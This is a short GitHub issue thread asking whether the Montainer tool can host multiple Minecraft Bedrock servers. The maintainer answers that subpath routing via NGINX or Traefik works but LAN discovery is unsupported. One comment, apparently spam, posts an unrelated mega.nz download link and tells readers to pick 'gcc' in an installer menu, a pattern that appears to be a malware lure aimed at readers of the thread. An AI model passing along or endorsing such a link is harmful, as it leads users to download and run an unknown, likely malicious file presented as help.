### ISSUE TITLE
Multiple worlds

### ISSUE THREAD

**Issue by oparisy** [WasinUddy/Montainer#7]
Hi, can Montainer deal with hosting multiple Bedrock servers (so that multiple maps can be served)?

There seem some be multiple ways to do this, depending on how/if you want to support servers discovery on LAN especially; see https://github.com/itzg/docker-minecraft-bedrock-server/issues/110 for example.

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by WasinUddy** [comment]
Yes it can i have a subpath environment variable which can help you host multiple server on different subpath for the webUI which you can later use stuff like NGINX or Traefik to route into different admin UI but Montainer still not support LAN discovery
